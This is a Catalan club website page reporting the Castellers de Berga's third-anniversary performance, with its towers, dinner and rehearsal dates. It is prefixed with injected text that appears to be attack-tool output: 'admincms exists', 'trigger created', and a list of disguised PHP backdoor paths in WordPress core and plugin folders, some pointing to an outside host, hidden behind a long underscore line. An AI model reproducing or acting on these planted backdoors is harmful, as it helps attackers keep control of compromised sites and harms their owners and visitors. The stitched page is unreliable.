Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/includes/class-bulk-plugin-upgrader-skin-wp-ajax-response-ajax-response-core-ajax-response-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-site-health-auto-updates-wp-private-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/media-new-ajax-stream-private-private-private-core-core-private-core.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/index-ajax-response-meta-private-stream-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/js_composer/index-cron-stream-cron-ajax-response-cron-ajax-response-core.php https://castellersdeberga.cat/wp-includes/blocks/site-logo-ajax-private-ajax.php https://castellersdeberga.cat/wp-includes/shortcodes-private-meta-cron-cron-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Gran tercer aniversari
 

Gran tercer aniversari


Gran tercer aniversariDissabte 18 de juliol, tres anys després del Bateig dels Castellers de Berga, vam celebrar la Diada del 3r Aniversari, acompanyats dels Salats de Súria i els Castellers de Sabadell. L’escenari escollit va ser la Plaça Viladomat. No és l’espai més bonic però, logísticament, és el més adient.
Abans de l’inici, els Castellers de Berga vam anar a fer un pilar a La Crepe, l’establiment col.laborador que va guanyar el sorteig d’un pilar durant la Fira de Maig. Moltes gràcies a tots els comerços i empreses que col.laboren amb nosaltres.
A 2/4 de 7 de la tarda, sota un cel amenaçador, començava la diada. Vam descarregar tot el que ens havíem plantejat. Després de dos pilar de 4 inicials, descarregàvem un 4 de 7 amb agulla. En segona ronda, el nostre castell límit, el més difícil tècnicament que hem fet fins al moment: el 5 de 7. Va ser el setè 5 de 7 que carreguem (6 descarregats + 1 carregat). En tercera ronda, vam descarregar un 4 de 7 molt lleuger. Un castell molt parat en tot moment i que permet somiar algun dia d’afegir-hi el pis de segons i descarregar el primer castell de 8. Queda molta feina a fer però el camí està encetat. Per arrodonir la diada, dos pilars de 5 simultanis. És la segona vegada que podem descarregar dos pilars de 5 a la vegada. Tres pilars de 4 van cloure l’actuació. Els nostres padrins de Sabadell van descarregar dos castells de 8: el 3 i el 4 de 8. Mentre que els Salats de Súria van descarregar el 3 de 7, com a millor castell.
Després de l’actuació, 350 castellers es van entaular a la mateixa Plaça Viladomat i, després de sopar, van gaudir de l’espectacle d’imitació de l’humorista Eugenio i de la música posterior de Panxocontents, The Papa’s and the Popo’s i PD Urrixic. La pluja va respectar tant la diada castellera com la festa posterior.
I diumenge 19 de juliol no hem faltat a la cita de l’Aplec dl Pi de les Tres Branques. Per quart any consecutiu hi hem participat. Als peus del l’arbre símbol dels Països Catalans hi hem alçat un pilar de 4.
Els berguedans tanquem la primera part de la temporada la setmana vinent. Dissabte 25 de juliol actuem a Altafulla, a la Plaça dels Vents. Aquesta setmana continuem els assajos. Dimarts 21, serem a Cal Cuberas, a 2/4 de 7 assaig de canalla i a les 8 assaig general. Portes obertes per a tothom.